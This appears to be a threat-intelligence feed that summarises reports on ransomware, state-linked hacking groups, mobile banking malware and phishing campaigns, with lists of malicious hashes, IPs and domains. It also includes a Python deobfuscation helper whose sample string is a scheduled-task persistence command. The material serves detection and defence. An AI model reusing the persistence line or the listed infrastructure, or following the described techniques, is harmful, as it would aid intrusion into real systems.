Type Indicator
FileHash-MD5 11cb1b221952268fcd6000e563752d79
FileHash-MD5 c508d432e3d521acaa6215934f609b2a
FileHash-MD5 e32eeea3676874431571f976d044a816
FileHash-SHA1 5e44ba99e81c6673b000519755e041c2d4082ae8
FileHash-SHA1 d40169c63e74d86cc0d02c638401bcd9ccdb621b
FileHash-SHA1 d4a85997999a975848b60fd52597538baf652daf
FileHash-SHA256 117aa133d19ea84a4de87128f16384ae0477f3ee9dd3e43037e102d7039c79d9
FileHash-SHA256 6cd0fbfb088a95b239e42d139e27354abeb08c6788b6083962943522a870cb98
FileHash-SHA256 83eea636c3f04ff1b46963680eb4bac7177e77bbc40b0d3426f5cf66a0c647ae
BlackSuit Ransomware
The report meticulously chronicles a sophisticated intrusion that began in December 2023 and culminated in the deployment of BlackSuit ransomware approximately 15 days later. The threat actor demonstrated an array of tactics, leveraging tools like Cobalt Strike, Sharphound, and SystemBC, alongside built-in Windows utilities, to establish a persistent foothold, exfiltrate data, and ultimately encrypt systems for financial gain. The investigation revealed the use of various obfuscation techniques, including process injection, proxy servers, and malleable command-and-control infrastructure, highlighting the actor's determination to evade detection.
Analysis of the BlackJack group: techniques, tools, and similarities with Twelve
The report examines the BlackJack hacktivist group targeting Russian organizations, focusing on their tools, techniques, and connections to the Twelve group. BlackJack employs freely available software like the Shamoon wiper and LockBit ransomware. Significant overlaps with Twelve include similar malware samples, identical file paths, and shared tactics. Both groups use network directories for malware distribution and scheduled tasks for execution. The analysis reveals a potential unified cluster of hacktivist activity against Russian targets, with no financial motives but aiming to cause maximum damage through data encryption, deletion, and theft.

Threat Actors leverage Docker Swarm and Kubernetes to mine cryptocurrency at scale
A new cryptojacking campaign targeting the Docker Engine API has been discovered, with the ability to move laterally to Docker Swarm, Kubernetes, and SSH servers. The attackers exploit exposed Docker API endpoints to deploy cryptocurrency miners and additional malicious payloads. They utilize Docker Hub to host malicious images and leverage Docker Swarm's orchestration features for command and control purposes. The campaign employs various techniques for lateral movement, persistence, and evasion, including manipulating Docker Swarm, exploiting the Kubernetes kubelet API, and installing backdoors. While some indicators suggest a possible link to TeamTNT, there is insufficient evidence for definitive attribution.

Iranian-backed group steps up phishing campaigns against Israel, U.S.
An Iranian government-backed threat group known as APT42 has significantly intensified its phishing campaigns targeting high-profile individuals in Israel and the United States over the past six months. The group, associated with Iran's Islamic Revolutionary Guard Corps, has focused on current and former government officials, political campaigns, diplomats, think tanks, NGOs, and academic institutions involved in foreign policy discussions. APT42's activities demonstrate a concerted effort to rapidly shift its operational priorities in line with Iran's political and military objectives.

Investigating Infrastructure and Tactics of Phishing-as-a-Service Platform Sniper Dz
Unit 42 explores Sniper Dz, a popular phishing-as-a-service (PhaaS) platform targeting social media and online services. Over 140,000 phishing websites associated with Sniper Dz were identified in the past year. The platform offers an admin panel with phishing page catalogs, allowing users to host on Sniper Dz infrastructure or download templates. Surprisingly, services are free, likely because Sniper Dz collects the stolen credentials. The platform uses public proxy servers to hide phishing content, obfuscates code, and employs centralized infrastructure for credential exfiltration and victim tracking. Sniper Dz abuses legitimate SaaS platforms, particularly Blogspot, and uses brand names or trends as keywords in hostnames. After credential theft, victims may be redirected to malicious advertisements or potentially unwanted applications.

Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware
A threat actor is targeting transportation and logistics companies in North America with malware campaigns. The actor uses compromised email accounts to inject malicious content into existing conversations, making messages appear legitimate. Campaigns primarily deliver Lumma Stealer, StealC, NetSupport, DanaBot, and Arechclient2 malware. The actor employs Google Drive URLs, .URL files, and SMB for malware delivery, and recently adopted the 'ClickFix' technique. Campaigns are small-scale and highly targeted, with lures impersonating industry-specific software. The activity is believed to be financially motivated and aligns with a trend of sophisticated social engineering combined with commodity malware use in the cybercriminal landscape.

Analysis of APT-C-00 (OceanLotus) Double Loader and Related VMP Loader
The report discusses recent attacks by APT-C-00 (OceanLotus), a state-sponsored hacking group. It analyzes two types of loaders used in their 2024 campaigns: a double loader and a VMP-protected version. The double loader consists of two modules: an MSVC DLL for initial information gathering and a GoLang DLL for payload execution. The VMP loader is a protected version of the double loader, using VMProtect 3.XX x64 to enhance its resistance to analysis. Both loaders ultimately deploy CobaltStrike Beacon modules with different C2 servers. The report highlights the group's use of various programming languages and false flag operations to complicate attribution.

Kryptina RaaS - From Unsellable Cast-Off to Enterprise Ransomware
This analysis examines the evolution of Kryptina, a ransomware-as-a-service platform, from a free tool on public forums to being actively used in enterprise attacks under the Mallox ransomware family. In May 2024, a Mallox affiliate leaked staging server data, revealing that their Linux ransomware was based on a modified version of Kryptina. The affiliate made superficial changes to source code and documentation, removing Kryptina branding but retaining core functionality. This adoption exemplifies the commoditization of ransomware tools, complicating malware tracking as affiliates blend different codebases into new variants. The report details the similarities and differences between the original Kryptina RaaS and the modified Mallox version, including encryption methods, ransom note templates, and configuration files.

How RansomHub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections
The RansomHub ransomware, attributed to a group tracked as Water Bakunawa, employs sophisticated anti-EDR techniques to evade security solutions. Its attack chain includes exploiting vulnerabilities like Zerologon, using EDRKillShifter to disable endpoint protection, and employing various evasion scripts. The ransomware targets multiple industries and critical infrastructure sectors, using spear-phishing for initial access. It utilizes tools like NetScan for network reconnaissance and AnyDesk for command and control. The attackers exfiltrate sensitive data using rclone before encrypting files and demanding ransom. The evolving tactics of RansomHub highlight the need for advanced, multi-layered security strategies to protect against modern ransomware threats.

ReadText34 Ransomware Incident
A ransomware attack was observed in September 2024, targeting an endpoint with limited visibility. The threat actor used stolen Administrator credentials to enable RDP and deploy malicious executables. They installed a vulnerable driver, TrueSight RogueKiller Antirootkit, to disable security applications. The ransomware, named ReadText34, utilized various techniques to disable system recovery and encrypt files. The attack involved the use of the BianLian Go Trojan for command and control. File encryption was performed using the native Windows utility cipher.exe. A ransom note was left, threatening to release stolen data if not contacted within 72 hours. The incident highlights the importance of comprehensive endpoint monitoring, incident response planning, and attack surface reduction efforts.

Uncovering ICICI Phishing Campaign: New Fraud App Found
A malicious host mimicking ICICI Bank has been discovered, along with a fraudulent app disguised as ICICI Helpdesk. The phishing domain, cppcccare.com, is hosted on an ASN known for various malicious activities. The fraudulent app, named 'ICICI.apk', is detected as a Trojan Banker, Keylogger, and SMSspy. It's believed to have been operational since August 2024, with a falsely inflated download count of 500K+. The app's description matches other fraudulent apps, indicating a broader phishing campaign. The incident has been reported to the bank, hosting provider, and CERT-IN authorities. The article provides detailed technical information about the malicious domain and app, including file hashes and package details.

Behind the CAPTCHA: A Clever Gateway of Malware
A sophisticated infection chain dubbed ClickFix has been observed using fake CAPTCHA pages to distribute Lumma Stealer malware. The campaign targets multiple countries through two main vectors: cracked game download URLs and phishing emails impersonating GitHub. Users are tricked into executing malicious scripts copied to their clipboards, leading to malware installation. The attack employs multi-layered encryption and leverages mshta to bypass detection. Mitigation strategies include user education, robust email filtering, and keeping systems updated. The global reach and deceptive tactics highlight the evolving nature of cyber threats.

Unmasking MuddyWater's Multiple RMM Software Attacks
MuddyWater, a threat group active since 2017, has been utilizing various Remote Monitoring and Management (RMM) software for attacks, particularly in the Middle East. Their tactics include spear-phishing emails with malicious attachments or links, leading to the installation of RMM tools like Atera Agent, ScreenConnect, Remote Utilities, N-Able, Syncro, and SimpleHelp. These legitimate tools are exploited to gain remote access and control over victim systems. The group's attacks are characterized by Arabic-language lures, use of file-sharing services, and a consistent deployment process. MuddyWater's activities primarily target government, military, and energy sectors, demonstrating sophisticated evasion techniques and a large arsenal of attack tools.

Necro Trojan infiltrates Google Play and Spotify and WhatsApp mods A new version of the Necro Trojan has infected various popular applications, including game mods and apps on Google Play, potentially affecting over 11 million Android devices. The multi-stage loader uses steganography to hide payloads and obfuscation to evade detection. Its modular architecture allows for targeted delivery of updates or new malicious modules. The Trojan can display ads, download and execute arbitrary files, install applications, open links in invisible windows, run tunnels through victim devices, and potentially subscribe to paid services. Infected apps include Wuta Camera, Max Browser, and modified versions of Spotify, WhatsApp, and games like Minecraft.
Inside SnipBot: The Latest RomCom Malware Variant A novel version of the RomCom malware family called SnipBot has been discovered, revealing post-infection activity from attackers on victim systems. This new strain employs new tricks and unique code obfuscation methods beyond those seen in previous RomCom versions. The infection chain begins with a downloader disguised as a PDF, followed by multiple stages including DLLs injected into explorer.exe. SnipBot provides backdoor capabilities allowing command execution, file exfiltration, and additional payload downloads. Analysis of attacker post-infection activity shows attempts to gather network information, exfiltrate files, and explore Active Directory. The malware authors appear experienced but not elite, with some minor code flaws present. SnipBot has evolved from earlier RomCom versions, with samples dating back to December 2023.
From initial compromise to ransomware and wipers The Twelve group, formed in April 2023 amid the Russian-Ukrainian conflict, specializes in attacking Russian government organizations. Their attacks involve encrypting and deleting victims' data, causing maximum damage without seeking financial gain. The group uses publicly available tools like Cobalt Strike, mimikatz, and PowerShell scripts for initial access, lateral movement, and privilege escalation. They employ LockBit 3.0 ransomware and Shamoon-based wipers to destroy infrastructures. Twelve exfiltrates sensitive data and posts it on Telegram. The group shares infrastructure with DARKSTAR, suggesting a possible syndicate. Their primary objectives are to destroy critical assets, disrupt business, steal sensitive data, and discredit victims.
Threat Tracking: Analysis of Lilith RAT ported to AutoIt Script In April 2024, S2W's Threat Research and Intelligence Center TALON analyzed a malicious LNK file disguised as a list of tax evasion explanatory documents. The LNK file executed a PowerShell command to download and run an AutoIt script-based Lilith RAT malware from an attacker's server, which establishes a reverse shell on the infected system. Similarities between this campaign and KONNI group's tactics, such as command obfuscation and the use of AutoIt-ported malware, suggest the threat actor behind this attack could be linked to KONNI.
From the Depths: Analyzing the Cthulhu Stealer Malware for macOS This report analyzes Cthulhu Stealer, a malware-as-a-service targeting macOS users to steal credentials and cryptocurrency wallets. It explores the malware's functionality, including prompting users for passwords, dumping keychain data, and exfiltrating stolen information. The analysis compares Cthulhu Stealer to Atomic Stealer, another macOS malware with similar capabilities, and provides insights into the malware's operators and distribution methods via underground forums.
Decoding the Stealthy Memory-Only Malware This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloader script, PEAKLIGHT, responsible for retrieving additional payloads from a content delivery network. The report examines different variations of PEAKLIGHT and the malware it delivers, including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The analysis highlights the obfuscation techniques employed by the threat actors, such as system binary proxy execution and CDN abuse.
Report on Ukraine government attack campaign Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfuscated PowerShell script designed to install the SPECTR malware and the new FIRMACHAGENT program. These components enabled data theft, document exfiltration, screenshot capturing, and browser data theft, while scheduled tasks managed the malware components. Reducing the attack surface by limiting user privileges and implementing application whitelisting policies can mitigate this threat.
Technical Analysis of Copybara This report presents a comprehensive technical analysis of a newly discovered variant of the Copybara Android malware. The malware, which emerged in November 2021, is primarily spread through voice phishing attacks. It utilizes the MQTT protocol for command-and-control communication and abuses Android's Accessibility Service to exert control over infected devices. The malware downloads phishing pages mimicking cryptocurrency exchanges and financial institutions to steal user credentials. The analysis covers 59 supported commands with detailed functionality descriptions, providing valuable insights into the malware's capabilities.
NGate Android malware relays NFC traffic to steal cash ESET researchers uncovered a crimeware campaign targeting bank customers in Czechia. The NGate Android malware can relay NFC data from victims' payment cards to attackers' devices, enabling unauthorized ATM withdrawals. It's the first time this capability has been observed in the wild. The campaign evolved from using phishing PWAs and WebAPKs to deploying NGate, which tricks victims into providing banking details and NFC card data.
Type Indicator
FileHash-SHA1 0c799950ec157bb775637fb3a033a502f211e62e
domain raiffeisen-cz.eu
hostname app.mobil-csob-cz.eu
hostname csob-93ef49e7a.tbc-app.life
hostname geo-4bfa49b2.tbc-app.life
hostname george.tbc-app.life
hostname nfc.cryptomaker.info
hostname rb-62d3a.tbc-app.life
hostname rb.2f1c0b7d.tbc-app.life
hostname rb.system.com
Be careful what you wish for – Phishing in PWA applications ESET analysts dissected a novel phishing method tailored to Android and iOS users, combining standard phishing delivery techniques with a novel approach of targeting mobile users via Progressive Web Applications (PWAs) and WebAPKs. Insidiously, installing these phishing PWAs and WebAPKs does not trigger warnings about installing third-party applications. Most of the observed applications targeted clients of Czech banks, but some also targeted banks in Hungary and Georgia. Two different threat actors were determined to be operating the campaigns based on their distinct command-and-control infrastructures.
Type Indicator
domain blackrockapp.eu
domain cyrptomaker.info
domain hide-me.online
domain play-protect.pro
hostname csas.georgecz.online
FileHash-SHA1 d3d5ae6b8ae9c7c1f8690452760745e18640150d
FileHash-SHA1 66f97405a1538a74cee4209e59a1e22192bc6c08
MoonPeak malware unveils new details on attacker infrastructure Cisco Talos has uncovered a campaign employing a new malware family called 'MoonPeak,' a remote access trojan actively developed by a North Korean advanced persistent threat group tracked as 'UAT-5394.' The analysis reveals the evolution of MoonPeak from an open-source malware called XenoRAT, with the threat actors introducing modifications to evade detection and analysis. Talos mapped the infrastructure used in this campaign, including command and control servers, payload hosting sites, and virtual machines for testing implants, unveiling the tactics, techniques, and procedures employed by UAT-5394.
Type Indicator
FileHash-MD5 535f59bc95fe3efc22abf5036c60ade0
FileHash-MD5 571c577595223518fd5a3ee8b36928d7
FileHash-MD5 60e8ed6c37e1fe9742a49916e07002e5
FileHash-MD5 9924b24434e2d92d0fc3b683006cbad1
FileHash-MD5 a470afe2f7176694553158bcd3decb53
FileHash-MD5 ca005ebe9454f30c2cedd73080677f56
FileHash-MD5 d3dd07f2454b9c81d9d16e65d6f24000
FileHash-MD5 e8ab7a58f35cae486d61c94910faa4fa
FileHash-MD5 ee1dca47840fbab6d8956ef97f352496
FileHash-MD5 fcbc07e56f496e836c29833b89a23fce
FileHash-SHA1 0eb6b3fa6f054d46158133c89df5eb5b30a37dfb
FileHash-SHA1 1f2fa02f4e71b27700888cee750d4681bd858b2a
FileHash-SHA1 2092423079ac375a59cd3cb320ca6d21d6732ed6
FileHash-SHA1 2ab49cbc1f4518e3368712a960c49a3e24975351
FileHash-SHA1 3495faeddcc98fc770bb9b275314234c8aae8502
FileHash-SHA1 63e9a16b0f4e7d8b290b95aec4cf3773f6e001df
FileHash-SHA1 7c837e382597a42244002062a6adf1f71417fbbe
FileHash-SHA1 8c1249d410a42319aa24cb9bdc0ab2cf4bca4342
FileHash-SHA1 a896a8140562c9e93828320d2a198a6dc24a453e
FileHash-SHA1 af1c0acd817a53e9ec1c8cd081cd3b112205e2ec
FileHash-SHA256 0b8897103135d92b89a83093f00d1da845a1eae63da7b57f638bab48a779808e
FileHash-SHA256 0ed643a30a82daacecfec946031143b962f693104bcb7087ec6bda09ade0f3cb
FileHash-SHA256 148c69a7a1e06dc06e52db5c3f5895de6adc3d79498bc3ccc2cbd8fdf28b2070
FileHash-SHA256 15eee641978ac318dabc397d9c39fb4cb8e1a854883d8c2401f6f04845a79b4b
FileHash-SHA256 1ad43ddfce147c1ec71b37011d522c11999a974811fead11fee6761ceb920b10
FileHash-SHA256 27202534cc03a398308475146f6710b790aa31361931d4fe1b495c31c3ed54f7
FileHash-SHA256 293b1a7e923be0f554ec44c87c0981c9b5cf0f20c3ad89d767f366afb0c1f24a
FileHash-SHA256 2b35ef3080dcc13e2d907f681443f3fc3eda832ae66b0458ca5c97050f849306
FileHash-SHA256 3e39fc595db9db1706828b0791161440dc1571eaa07b523df9b721ad65e2369b
FileHash-SHA256 4108c5096a62c0a6664eed781c39bb042eb0adf166fcc5d64d7c89139d525d4f
FileHash-SHA256 41d4f7734fbf14ebcdf63f51093718fd5a22ec38a297c0dc3d7704a3fb48b3f9
FileHash-SHA256 44e492d5b9c48c1df7ef5e0fe9a732f271234219d8377cf909a431a386759555
FileHash-SHA256 458641936e2b41c425161a9b892d2aa08d1de2bc0db446f214b5f87a6a506432
FileHash-SHA256 4599a9421e83fb0e2c005e5d9ac171305192beabe965f3385accaf2647be3e8e
FileHash-SHA256 58fdc1b6ce4744d6331f8e2efc4652d754e803cae4cc16101fc78438184995e6
FileHash-SHA256 6a3839788c0dafe591718a3fb6316d12ccd8e82dbcb41ce40e66b743f2dd344d
FileHash-SHA256 6bf8a19deb443bde013678f3ff83ab9db4ddc47838cd9d00935888e00b30cee6
FileHash-SHA256 72a25d959d12e3efe9604aee4b1e7e4db1ef590848d207007419838ddbad5e3f
FileHash-SHA256 8a4fbcdec5c08e6324e3142f8b8c41da5b8e714b9398c425c47189f17a51d07b
FileHash-SHA256 97ba8d30cf8393c39f61f7e63266914ecafd07bd49911370afb866399446f37d
FileHash-SHA256 a80a35649f638049244a06dd4fb6eca4de0757ef566bfbe1affe1c8bf1d96b04
FileHash-SHA256 b8233fe9e903ca08b9b1836fe6197e7d3e98e36b13815d8662de09832367a98a
FileHash-SHA256 f4aa4c6942a87087530494cba770a1dcbc263514d874f12ba93a64b1edbae21c
FileHash-SHA256 f928a0887cf3319a74c90c0bdf63b5f79710e9f9e2f769038ec9969fcc8ee329
FileHash-SHA256 facf3b40a2b99cc15eee7b7aee3b36a57f0951cda45931fcde311c0cc21cdc71
domain nmailhostserver.store
domain nsonlines.store
domain pumaria.store
domain yoiroyse.store
Russia-linked crypto threat actor involved in political spoofing tracked A Russia-linked threat actor is deploying domains for crypto scams targeting the US Presidential Election and prominent tech brands. The scams involve fake Bitcoin and Ethereum giveaways, asking users to send coins to attacker-controlled wallets with false promises of doubling returns. A large cluster of domains featuring US political figures, business leaders, and global brands has been discovered, using counterfeit legal letters from US agencies to add legitimacy. Targets include Donald Trump, Kamala Harris, Tim Cook, Elon Musk, and others. The campaign involves spoofed websites, CAPTCHA protection, and chat functions. Some domains feature Russian language content. The threat actor uses Cloudflare for hosting and has registered domains with a Russian email address.
Type Indicator
domain apple-event2024.com
domain btcstarship.com
domain cryptologic.online
domain debate.gives
domain trumpdebate24.com
hostname musk.trump.io
Derailing the Raptor Train A large, multi-tiered botnet called Raptor Train, likely operated by the Chinese state-sponsored threat actor Flax Typhoon, has been discovered. Consisting of over 60,000 compromised SOHO and IoT devices at its peak, it is one of the largest Chinese state-sponsored IoT botnets seen to date. The botnet is run through a control system called Sparrow that manages its infrastructure and tasking. While no DDoS attacks have been observed, the botnet has targeted U.S. and Taiwanese entities in sectors including military, government, education, and telecommunications. The network has three tiers: compromised devices, exploitation and C2 servers, and management nodes. Campaigns have evolved over four years, showing increasing sophistication in tactics and scale.
Type Indicator
CVE CVE-2024-21887
IPv4 45.92.70.111
IPv4 45.92.70.112
IPv4 45.92.70.113
IPv4 45.92.70.115
IPv4 45.92.70.68
IPv4 45.92.70.71
IPv4 185.207.154.253
IPv4 23.236.68.161
IPv4 23.236.69.110
IPv4 23.236.69.82
IPv4 45.10.58.133
IPv4 45.13.199.104
IPv4 45.13.199.152
IPv4 45.13.199.45
IPv4 45.80.215.149
IPv4 5.188.33.228
IPv4 65.20.97.251
IPv4 85.90.216.110
IPv4 92.38.178.232
IPv4 92.38.185.45
FileHash-SHA256 2aa12e5989065951be84ce932b65bd197dd6be3fa987838bad48536c0c74d145
FileHash-SHA256 546390a3a296154e36051dda745b573658311f9831789bb1faca411a3803a9bb
FileHash-SHA256 c6fe1748e68923f278926ee8679aaee22800b9c93c38641d12ea0e945e116bb0
IPv4 104.244.89.157
IPv4 114.255.70.20
IPv4 114.255.70.30
IPv4 139.180.137.219
IPv4 14.1.98.223
IPv4 149.248.51.22
IPv4 155.138.133.56
IPv4 155.138.151.225
IPv4 185.14.45.160
IPv4 195.234.62.18
IPv4 195.234.62.184
IPv4 195.234.62.188
IPv4 195.234.62.19
IPv4 195.234.62.192
IPv4 195.234.62.197
IPv4 195.234.62.198
IPv4 202.182.109.151
IPv4 207.148.122.69
IPv4 207.148.68.131
IPv4 210.61.186.117
IPv4 223.98.159.112
IPv4 23.236.68.193
IPv4 23.236.68.213
IPv4 23.236.68.229
IPv4 37.61.229.15
IPv4 37.61.229.17
IPv4 37.9.35.89
IPv4 45.10.58.128
IPv4 45.10.58.129
IPv4 45.10.58.130
IPv4 45.10.58.132
IPv4 45.13.199.140
IPv4 45.13.199.207
IPv4 45.13.199.84
IPv4 45.13.199.96
IPv4 45.135.117.131
IPv4 45.135.117.136
IPv4 45.77.231.209
IPv4 45.80.215.150
IPv4 45.80.215.151
IPv4 45.80.215.152
IPv4 45.80.215.154
IPv4 45.80.215.155
IPv4 45.80.215.156
IPv4 45.80.215.186
IPv4 45.80.215.47
IPv4 5.181.27.19
IPv4 5.181.27.21
IPv4 5.181.27.219
IPv4 5.181.27.6
IPv4 5.188.33.135
IPv4 5.45.184.68
IPv4 78.141.238.97
IPv4 85.90.216.111
IPv4 85.90.216.112
IPv4 85.90.216.115
IPv4 85.90.216.116
IPv4 85.90.216.69
IPv4 89.44.198.195
IPv4 89.44.198.200
IPv4 89.44.198.254
IPv4 91.216.190.154
IPv4 91.216.190.2
IPv4 91.216.190.247
IPv4 91.216.190.74
IPv4 91.216.190.80
IPv4 92.223.30.232
IPv4 92.223.30.233
IPv4 92.223.30.241
IPv4 92.38.135.146
IPv4 92.38.176.131
IPv4 92.38.176.156
IPv4 92.38.185.43
IPv4 92.38.185.44
IPv4 92.38.185.46
IPv4 92.38.185.47
domain adjsn.com
domain amdord.com
domain aqakffj.com
domain bcdkwwuah.com
domain bkhqwfhtu.com
domain blepmhnay.com
domain bxgtbv.com
domain clqqknzb.com
domain cvgeuwo.com
domain cvmnomvxm.com
domain dkuwbcen.com
domain dvujvkfu.com
domain ecvkiehs.com
domain eufcj.com
domain fajxtg.com
domain ftcexq.com
domain glxxet.com
domain gmhrxhc.com
domain grntjr.com
domain hersrr.com
domain hfsdln.com
domain hy1025.com
domain hy229.com
domain hy30.com
domain hy324.com
domain hy42.com
domain hy424.com
domain hy529.com
domain hy619.com
domain hy811.com
domain hy830.com
domain hy92.com
domain hyddh.com
domain iycwqot.com
domain jgnsqihc.com
domain jkwxcc.com
domain kmgzbowwg.com
domain lfzupr.com
domain lofeuq.com
domain lomuzs.com
domain lznmihdej.com
domain mudvw.com
domain mvxnspcqr.com
domain nhcmdikkd.com
domain nmfagp.com
domain obqlibg.com
domain oicdsgjxz.com
domain omviak.com
domain oploz.com
domain osiso.com
domain qjknpv.com
domain qsxgzu.com
domain rnjca.com
domain saoadlg.com
domain sbuybjv.com
domain sreudcnb.com
domain ttcyci.com
domain tvcvhzyk.com
domain ujrtkw.com
domain vbbrfvhrg.com
domain vgbgwzmr.com
domain wndaoyk.com
domain woaba.com
domain wvsezu.com
domain ykcmewapc.com
domain ysubryfv.com
domain zuszr.com
hostname aewreiuicajo.w8510.com
hostname apdfhhjcxcb.w8510.com
hostname api.k3121.com
hostname awbpxtpi.w8510.com
hostname awerdasvbjgrt.b2047.com
hostname awqx.k3121.com
hostname axqw.k3121.com
hostname ayln.b2047.com
hostname bzbatflwb.w8510.com
hostname firc.b2047.com
hostname hnai.k3121.com
hostname hume.b2047.com
hostname hyjk.k3121.com
hostname kliscjaisdjhi.w8510.com
hostname kuyw.b2047.com
hostname lfdx.k3121.com
hostname lyblqwesfawe.w8510.com
hostname mail.k3121.com
hostname mjiudwajhkf.w8510.com
hostname nulp.k3121.com
hostname ocmnusdjdik.w8510.com
hostname oklm.k3121.com
hostname qwsd.k3121.com
hostname tuisasdcxzd.w8510.com
hostname voias.b2047.com
hostname wmllxwkg.w8510.com
hostname xaqw.k3121.com
hostname xbqw.k3121.com
hostname xxqw.b2047.com
hostname zasdfgasd.w8510.com
hostname zdacasdc.w8510.com
hostname zdacxzd.w8510.com
Kimsuky: A Gift That Keeps on Giving This analysis details a sophisticated cyber attack attributed to the North Korean-linked Kimsuky APT group. The attack begins with an LNK file, leading to the execution of obfuscated VBS scripts. These scripts create scheduled tasks, modify registry keys for persistence, and establish communication with a command and control (C2) server. The malware employs various evasion techniques, including Base64 encoding and Caesar Cipher obfuscation. The ultimate goal appears to be maintaining long-term access to the victim's machine for espionage activities. The report also includes a personal anecdote of the analyst's brief interaction with the C2 server, receiving a single command after hours of waiting.
Type Indicator
FileHash-MD5 0c3fd7f45688d5ddb9f0107877ce2fbd
FileHash-MD5 37fb639a295daa760c739bc21c553406
FileHash-MD5 4cbafb288263fe76f5e36f1f042be22d
FileHash-MD5 622358469e5e24114dd0eb03da815576
FileHash-MD5 73ed9b012785dc3b3ee33aa52700cfe4
FileHash-SHA1 50e4d8a112e4aad2c984d22f83c80c8723f232da
FileHash-SHA256 41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
IPv4 64.49.14.181
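The pulse above says the Kimsuky VBS stages hide their strings behind Base64 encoding and a Caesar cipher but does not give the layering or the shift. The following triage helper is an added example for this page, not the analyst's tooling: it assumes the script text was Base64-encoded and the letters of that encoding were then Caesar-shifted, tries all 26 shifts, Base64-decodes each candidate and keeps the one that looks most like script text. The sample blob is constructed here from a harmless persistence one-liner; VBS_HINTS and the 1.0 score cut-off are assumptions.

```python
"""Triage helper for Base64 + Caesar obfuscated VBS strings (added example).
Assumed layering: plaintext -> Base64 -> Caesar shift of the letters only.
Digits, '+', '/' and '=' are left alone by the shift, so every candidate is
still valid Base64 and the decode that scores best wins."""
import base64
import string

# Tokens that make a candidate plaintext look like the VBS the pulse describes.
VBS_HINTS = ("createobject", "wscript", "shell", "schtasks", "regwrite", "hkcu", "http")


def caesar(text, shift):
    """Shift ASCII letters by `shift` positions (negative undoes); other chars untouched."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def score(data):
    """Higher is more script-like: printable ratio plus keyword hits; -1 if not ASCII."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return -1.0
    printable = sum(ch in string.printable for ch in text) / max(len(text), 1)
    low = text.lower()
    return printable + sum(hint in low for hint in VBS_HINTS)


def deobfuscate(blob):
    """Undo each of the 26 possible shifts, Base64-decode, keep the best score.
    Returns (shift, plaintext) or None when nothing decodes to plausible text."""
    best = None
    for shift in range(26):
        try:
            raw = base64.b64decode(caesar(blob, -shift), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        s = score(raw)
        if s < 0:
            continue  # wrong shift: decoded bytes are not ASCII at all
        if best is None or s > best[0]:
            best = (s, shift, raw.decode("ascii"))
    if best is None or best[0] < 1.0:
        return None
    return best[1], best[2]


# Constructed sample: a benign scheduled-task one-liner, Base64-encoded, then
# letter-shifted by 7. Not a string taken from the Kimsuky sample.
PLAINTEXT = ('Set sh = CreateObject("WScript.Shell"): sh.Run '
             '"schtasks /create /sc minute /mo 1 /tn Update /tr C:\\u\\x.vbs", 0')
SAMPLE_BLOB = caesar(base64.b64encode(PLAINTEXT.encode()).decode(), 7)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_BLOB))
```

On a real sample, feed each quoted string literal from the dropped VBS to deobfuscate() and treat a None result as a sign that the layering differs from the assumed one (for instance, a shift applied before encoding or a non-standard alphabet).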
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC Earth Baxia, a suspected China-based threat actor, targeted government organizations, telecommunication businesses, and the energy industry in multiple Asia-Pacific countries. The group employed sophisticated techniques, including spear-phishing emails and exploitation of a GeoServer vulnerability (CVE-2024-36401). They deployed customized Cobalt Strike components and a new backdoor called EAGLEDOOR on compromised machines. EAGLEDOOR supports multiple communication protocols for information gathering and payload delivery. The attackers used public cloud services to host malicious files, making tracking difficult. They also utilized techniques like GrimResource and AppDomainManager injection to deploy additional payloads. The campaign affected countries including Taiwan, Philippines, South Korea, Vietnam, Thailand, and potentially China.
Type Indicator
IPv4 167.172.89.142
CVE CVE-2024-36401
IPv4 152.42.243.170
IPv4 167.172.84.142
IPv4 188.166.252.85
hostname static.krislab.site
FileHash-MD5 249c2d77aa53c36b619bdfbf02a817e5
FileHash-MD5 55689e6075629b68798c1feb2d168516
FileHash-MD5 9bbb096a052ad6e4055b39f2c9216026
FileHash-MD5 9f376a334f9362c6c316a56e2ffd4971
FileHash-MD5 e51f2ea5a877e3638457e01bf46a20e1
FileHash-SHA1 9833566856f924e4a60e4dd6a06bf9859061f4be
FileHash-SHA1 d9b814f53e82f686d84647b7d390804b331f1583
FileHash-SHA1 dce0a4c008ea7c02d768bc7fd5a910e79781f925
FileHash-SHA1 e2b0c45beadff54771a0ad581670a10e76dc4cf1
FileHash-SHA256 04b336c3bcfe027436f36dfc73a173c37c66288c7160651b11561b39ce2cd25e
FileHash-SHA256 061bcd5b34c7412c46a3acd100167336685a467d2cbcd1c67d183b90d0bf8de7
FileHash-SHA256 1c13e6b1f57de9aa10441f63f076b7b6bd6e73d180e70e6148b3e551260e31ee
FileHash-SHA256 1c26d79a841fdca70e50af712f4072fea2de7faf5875390a2ad6d29a43480458
FileHash-SHA256 1e6c661d6981c0fa56c011c29536e57d21545fd11205eddf9218269ddf53d448
FileHash-SHA256 4ad078a52abeced860ceb28ae99dda47424d362a90e1101d45c43e8e35dfd325
FileHash-SHA256 4edc77c3586ccc255460f047bd337b2d09e2339e3b0b0c92d68cddedf2ac1e54
FileHash-SHA256 6be4dd9af27712f5ef6dc7d684e5ea07fa675b8cbed3094612a6696a40c664ce
FileHash-SHA256 916f3f4b895c8948b504cbf1beccb601ff7cc6e982d2ed375447bce6ecb41534
FileHash-SHA256 9b50e888aaec0e4d105a6f06db168a8a2dcf9ab1f9deeff4b7862463299ab1ca
FileHash-SHA256 b3b8efcaf6b9491c00049292cdff8f53772438fde968073e73d767d51218d189
